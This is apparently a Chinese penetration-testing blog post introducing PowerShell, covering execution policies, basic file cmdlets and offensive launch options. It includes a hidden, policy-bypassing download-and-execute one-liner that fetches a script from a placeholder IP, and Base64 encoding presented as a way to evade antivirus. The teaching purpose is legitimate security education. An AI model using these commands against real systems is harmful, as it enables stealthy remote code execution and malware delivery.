[渗透测试]02 PowerShell基础

最新推荐文章于 2024-10-22 22:18:10 发布
最新推荐文章于 2024-10-22 22:18:10 发布
阅读量607 收藏 1
点赞数 4
分类专栏: 渗透测试实战 文章标签: 内网渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cosmoslin/article/details/122819650
版权

PowerShell是一种命令行外壳程序和脚本环境,它内置在 Windows 7、Windows Server 2008 R2 及更高版本的 Windows 系统中,同时 PowerShell 是构建在 .NET 平台上的,所有命令传递的都是 .NET 对象。

PowerShell 有如下特点:

  • Windows 7 以上的操作系统默认安装
  • PowerShell 脚本可以运行在内存中,不需要写入磁盘
  • 可以从另一个系统中下载 PowerShell 脚本并执行
  • 目前很多工具都是基于 PowerShell 开发的
  • 很多安全软件检测不到 PowerShell 的活动
  • cmd 通常会被阻止运行,但是 PowerShell 不会
  • 可以用来管理活动目录

可输入 Get-Host 或者 $PSVersionTable 查看 PowerShell 版本:

image-20220127224405538

基本概念

ps1 文件

ps1 是PowerShell 的脚本扩展名,一个 PowerShell 脚本文件其实就是一个简单的文本文件。

执行策略

为了防止使用者运行恶意脚本,Powershell提供了一个执行策略。默认情况下是"不可执行"。

我们可以使用 Get-ExecutionPolicy命令查看当前执行策略

执行策略有以下几种:

Restricted:脚本不能运行(默认)

RemoteSigned:本地创建的脚本可以运行,但从网上下载的脚本不能运行(除非它们拥有由受信任的发布者签署的数字签名)

AllSigned:仅当脚本由受信任的发布者签名才能运行。

Unrestricted:允许所有脚本运行

在管理员权限下可以使用Set-ExecutionPolicy <policy name>设置执行策略。

运行脚本

PowerShell 运行脚本的方式和其他 shell 基本一致,可以输入完整路径运行,也可以到 ps1 文件所在目录下去运行。

管道

管道的作用是将前一个命令的输出作为另一个命令的输入,两个命令之间使用 “|” 进行连接。

例如,在 PowerShell 中获取进程信息并以程序 ID 进行排序

image-20220207114943019

常用命令

文件操作

新建目录test:New-Item test -ItemType directory 
删除目录test:Remove-Item test 
新建文件test.txt:New-Item test.txt -ItemType file 
新建文件test.txt,内容为 hello:New-Item test.txt -ItemType file -value "hello" 
删除文件test.txt:Remove-Item test.txt 
查看文件test.txt内容:Get-Content test.txt 
设置文件test.txt内容t:Set-Content test.txt -Value "hello" 
给文件test.txt追加内容:Add-Content test.txt -Value ",word!" 
清除文件test.txt内容:Clear-Content test.txt

绕过本地权限并执行

绕过安全策略

PowerShell.exe -ExecutionPolicy Bypass -File t.ps1

绕过本地权限并隐藏执行

加入-WindowStyle Hidden -NoLogo -NonInteractive -NoProfile 即可隐藏执行。

PowerShell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoLogo -NonInteractive -NoProfile -File t.ps1

下载远程脚本绕过权限并隐藏执行

PowerShell.exe -Exec Bypass -W Hidden -NoLogo -NonI -NoP "IEX(New-Object Net.WebClient).DownloadString('http://xxx.xxx.xxx.xxx:8000/t.ps1')"

利用 Base64 对命令进行编码

使用 Base64 进行编码主要是为了混淆和压缩代码,从而避免脚本因为一些特殊字符而被杀毒软件查杀。

可以使用python脚本进行编码

地址

下载好后,需要先将要执行的命令保存到文本文件中,这里保存到了 tmp.txt 文本中,之后执行 python ps_encoder.py -s tmp.txt 即可

使用 –Enc 指定 Base64 编码内容

PowerShell.exe -Exec Bypass -Enc base64编码内容

常用参数:

-NoLogo:启动不显示版权标志的PowerShell
-ExecutionPolicy Bypass (-Exec Bypass) :绕过执行安全策略
-WindowStyle Hidden (-W Hidden):隐藏窗口
-NoProfile (-NoP):不加载当前用户的配置文件
–Enc:执行 base64 编码后的 powershell 脚本字符串
-Noexit:执行后不退出Shell,这在使用键盘记录等脚本时非常重要
-NonInteractive (-Nonl):非交互模式,PowerShell 不为用户提供交互的提示

参考:《内网安全攻防》

Snakin_ya
关注
专栏目录
PowerShell禁止执行策略绕过实践
awindog的博客
02-22 2607
在Windows中,为了防止使用者允许恶意脚本,PowerShell提供了一个执行策略,在默认情况下这个策略为不能运行。 那我们如何指导运行规则呢? cmd中执行 powershell Get-ExecutionPolicy 这里为Restricted,那其实相关的策略有: 策略 描述 Restricted 默认设置。在任何条件下,都不允许PowerShell脚本运行 All...
PowerShell: 如何使用PowerShell远程登录,如何使用PowerShell建立远程会话
码农杰克
06-10 5479
在服务器上执行远程脚本的时候一般可以使用Invoke-Command,但是如果连续执行脚本,并且想在执行过程中保持上下文信息,也就是说交互式的执行远程命令,就得用到今天要说的另外一个命令了 Enter-PSSession。
什么是shell外壳程序?一篇文章带你理解透彻!!
CPPER
10-09 740
详谈Linux下的shell外壳
win11如何更改执行策略以在 PowerShell 上运行脚本
Detectiveboy的博客
10-13 2403
win11如何更改执行策略以在 PowerShell 上运行脚本如果您在运行 PowerShell 脚本时遇到错误,那是因为您需要更改执行策略,方法如下。在Windows 11(或 10)上,默认情况下,当您尝试在 PowerShell 上运行脚本时,它将失败并显示“无法加载,因为在此系统上禁用了运行脚本”错误消息。这是因为 PowerShell 带有一个“执行策略”安全功能,可以控制如何加载配置文件和运行脚本,以防止恶意代码在系统上运行。
解决PowerShell上运行脚本被禁用错误
xkdlzy的专栏
06-10 5428
解决PowerShell上运行脚本被禁用错误
【推荐】最新超全的渗透测试学习基础教程集合(84份).zip
08-04
最新超全的渗透测试学习基础教程集合,新手、大佬都可以阅读: 01.入门笔记之看雪Web安全学习及异或解密示例; 02.Chrome浏览器保留密码功能渗透解析及登录加密入门笔记; 03.Burp Suite工具安装配置、Proxy基础用法...
powershell渗透基础
qq_46804551的博客
04-30 1312
一旦攻击者可以在一台计算机上运行代码,就会下载powershell脚本文件(.ps1)到磁盘中 执行,甚至无需写到磁盘中执行,它可以直接在内存中运行,利用诸多特点攻击者可以持续攻击而不被轻易发现。 常用的powershell攻击工具有以下几种: powerSploit: 常用于信息探测,权限提升,凭证窃取,持久化等操作 Nishang: 基于powershell渗透测试专用工具,集成了框架,脚本和各种payload,包含下载和执行,键盘记录,DNS,延时命令等脚本 Empire: 基于powe
监控渗透测试powershell白名单利用行为
12306小哥
05-08 732
简介 您可以使用PowerShell.exe从另一个工具(例如Cmd.exe)的命令行启动PowerShell会话,也可以在PowerShell命令行启动新会话。从此处阅读Microsoft Windows官方网站上的更多信息。 补充说明:在高版本powershell(V5以上含V5)中,可以通过配置策略,对进程命令行参数进行记录,具体策略可参考powershell事件。同样也可以在不同版本操作系统中部署sysmon,通过sysmon日志进行监控。 基础日志 windows 安全日志/SYSMON日志(需要
掌握PowerShell渗透测试代码,Pentesting学院课程精华
由于提供的文件信息中没有具体的代码内容,但标题提到"PentestingAcademy:Pentesting 学院课程代码",我们可以推断该课程代码可能包含了多种用于渗透测试PowerShell脚本和命令。这些脚本和命令可能覆盖了网络扫描...
Powershell免杀
mingyqf的博客
05-11 2478
Powershell免杀 本文作者:Chenw 本文链接:https://www.cnblogs.com/chen-w/p/14726549.html 0x01 前言 前几天搞一个站的时候,进入内网,想让内网一台机子powershell上线。然后被杀软拦截了,极其的不讲武德,想着找我极强的朋友们白嫖个免杀的方法。 后面还是没有白嫖到,只好自己去研究学习一下了(针对CS的进行免杀,后面思想大同小异)于是做了这个小笔记。 0x02 Powershell免杀思路 先介绍一下powershell木马最常用的方式
Set-ExecutionPolicy RemoteSigned 是什么意思
m0_57236802的博客
09-05 4904
是一个 PowerShell 命令,用于更改 PowerShell 脚本的执行策略。这个特定的设置允许你运行本地创建的脚本,而从 Internet 下载的脚本必须有一个数字签名才能运行。要以管理员权限运行这个命令,你需要打开一个以管理员身份运行的 PowerShell 窗口。因此,在更改执行策略之前,最好确保你了解其含义和潜在的安全影响,并确保你只运行来自可信来源的脚本。可能会有一个提示,要求你确认更改,按照指示进行即可。将允许任何脚本运行,这可能会暴露系统于潜在的恶意软件攻击。
PowerShell实战2:Remote_Host
jackiechen_vip的专栏
09-17 902
功能:检测远程主机的硬件信息,安装的软件列表,以及正在运行的进程列表。 使用:第一步, 输入IP地址或机器名               第二步,选择1 (硬件信息),2 (安装的软件列表),3 (运行的进程列表), X (退出) 源码 cls Write-Host "Please type the name of IP of the host:"
PowerShell】如何利用PowerShell进行远程管理?
最新发布
qq_24766857的博客
10-22 657
PowerShell 提供了远程管理功能,允许管理员在不直接登录到目标计算机的情况下执行命令。这可以通过 WinRM (Windows Remote Management) 服务来实现,该服务基于 WS-Management 协议。
power shell远程_15. PowerShell -- 远程管理(1)
weixin_35554273的博客
12-28 755
·PowerShell中的远程管理:通过远程管理计算机,通过WinRM (Windows Remote Management)起作用,它是基于微软的WS-Management协议的。·PowerShell 2.0远程管理的条件,必须安装以下软件(默认在windows 7, 2008 R2上安装),并且能够在XP SP3, Server 2003 SP2,Vista,2008 SP1-SP3上安装;...
PowerShell介绍 第二回 "PowerShell执行策略"
MMMMMMELODY的博客
11-07 2402
是不是遇到过以下情况?执行策略的时候被禁止了:  所以可以通过以下策略来查看当前的执行策略:Get-ExecutionPolicy 默认设置为最安全的策略“Restricted”。该设置允许运行单个命令,但不允许运行脚本。我的测试环境的测试是RemoteSigned 说明:如果该命令执行失败,则可能是由于拼错了策略名称。请检查该名称,然后重试。按Tab键自动补齐则会减少出
PowerShell中出现”禁止执行脚本“的解决方法
Programmer's Way
08-10 6650
PowerShell禁止执行脚本
PowerShell-2.解决禁止本地执行脚本
天使也掉毛
12-01 1万+
PowerShell-解决禁止本地执行脚本
powershell 远程执行命令失败
热门推荐
lijiecong的专栏
07-31 1万+
Connecting to remote server failed with the following error message : The WinRM client cannot process the  request. If the authentication scheme is different from Kerberos, or if the client computer
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Snakin_ya

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值